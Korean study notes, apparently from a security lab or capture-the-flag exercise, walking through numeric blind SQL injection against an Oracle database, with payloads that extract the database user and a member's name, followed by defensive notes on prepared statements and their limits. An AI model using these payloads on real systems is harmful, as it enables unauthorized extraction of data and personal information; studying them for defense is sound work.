1. 쿼리문 유추
제품 번호 뒤에 주석처리를 했을 때 결과가 잘 나오는 것을 확인했다. 
==> select 컬럼들 from 상품정보 where 상품번호=_id_

2. 공격 포인트
    ** 숫자형인지 아는 방법: 연산을 해보면 됨!! ex> ?id=62-1 (+는 스페이스바 처리하니까 인코딩 필요! - %2b)
    61&1=1
    61 and _공격쿼리_ --
    검색 쿼리: 61 and _공격쿼리_ --

3. DB 유저명 --> DB 구분법: oracle vs mysql vs mssql (그냥 해보기^^)
    select user from dual
    3-1. DB 유저명 길이: 8
        (select length(user) from dual)
        > 61 and (select length(user) from dual)>0 --
    3-2. DB 유저명 구하기: 85 83 69 87 79 82 76 68
        (select ascii(substr(user,1,1)) from dual)
        > 61 and (select ascii(substr(user,1,1)) from dual)>0 --
    3-3. 파이썬으로 아스키에서 문자 변경
    >>> chr(85)
    'U'
    >>> chr(83)
    'S'
    >>> chr(69)
    'E'
    >>> chr(87)
    'W'
    >>> chr(79)
    'O'
    >>> chr(82)
    'R'
    >>> chr(76)
    'L'
    >>> chr(68)
    'D'
    -> 유저명: USEWORLD

4. 플래그 구하기
    검색창에 유저명 검색
[답] user_is_my_nickname

==============================================================
++ Bonus : 첫번째 회원의 이름! 털기 > select name from member where rownum = 1

1. 검색 쿼리: 61 and _공격쿼리_

2. 회원 이름 알아내기
    [쿼리문] select name from member where rownum = 1
    2-1. 회원 이름 길이 알아내기: 3
        select lengthb(name) from member where rownum = 1
        > 61 and (select lengthb(name) from member where rownum = 1)>0
    2-2 (1) 회원 이름 유니코드를 아스키로 바꿔서 알아내기: (92 65 69 52 48) (92 67 49 51 56) (92 67 54 65 57)
        select ascii(substr(asciistr(substr(name,1,1)),2,1)) from member where rownum=1
        // 이름을 3글자로 나누고, 유니코드로 변환 후(16진수) 5글자로 나눠 각각 알아냄
        > 61 and (select ascii(substr(asciistr(substr(name,1,1)),2,1)) from member where rownum=1)>0
    2-2 (2) 회원 이름 유니코드 구하기: 2-> 44608, 7-> 49464, 12-> 50857 (18번째는 존재하지 않음)
        select (to_number(n,'xxxx'))>0 from (select substr(asciistr(name),18,1) as n from member where rownum=1)
        > 61 and (select (to_number(n,'xxxx')) from (select substr(asciistr(name),18,1) as n from member where rownum=1))>0
    2-3. 파이썬 사용해 유니코드를 한글로 변환하기
        name = '\uAE40\uC138\uC6A9'
        nameb = name.encode("cp949") 
        // nameb = b'\xb1\xe8\xbc\xbc\xbf\xeb'
        namestr = str(nameb, 'cp949')
        print(namestr)  
        > 김세용
[답] 김세용

==============================================================
* 대응방안 (시큐어코딩/필터링 --> 가장 안좋은 답변)
1. Prepared Statement / Statement
    * Prepared Statement (python 예시 코드)
    sql = "SELECT * FROM users WHERE username = %s AND password = %s"
    statement = connection.cursor(prepared=True)
    statement.execute(sql, ('john', 'pass123'))    
    result = statement.fetchall()# 결과를 가져옵니다.

2. 필터링 ex> 뭐가 들어오면 지우기/우회하기 등등등....
    -> 공식 라이브러리 쓰는 게 좋다!!
3. 숫자형 -> 
    3-1. 검색어=int(검색어) # 숫자가 아니면 밑으로 넘어가지 XX (파이썬은 )
        query = "select 컬럼들 from 상품정보 where id = _숫자_"
    3-2. ' 못쓰게 하면 나쁘지 않다^^
3. 사용자 입력값 검증 -> X

==============================================================
Prepared Statement --> 1000% 안전한가?
    prepared statement는 미리 쿼리문 준비한 것
    컬럼과 테이블이 고정되어 있다 
        --> order by 뒤의 값을 바인딩하면 테이블 생성 불가능 --> 컴파일 안됨
        그래서 바인딩을 안함 --> 그래도 sqli 못할 거라고 생각...(뒤의 값 무시해욥.)
        --> [숫자형 injection] case문 사용하면 된다!!
            case when 조건 then 참 and 거짓;
    YES: 제대로만 쓰면(컬럼/테이블 입력값 없이) 안전
    NO: 컬럼과 테이블에는 바인딩이 안되니까 고려해서 잘 안쓰면 취약 ex> 정렬기능에서 多
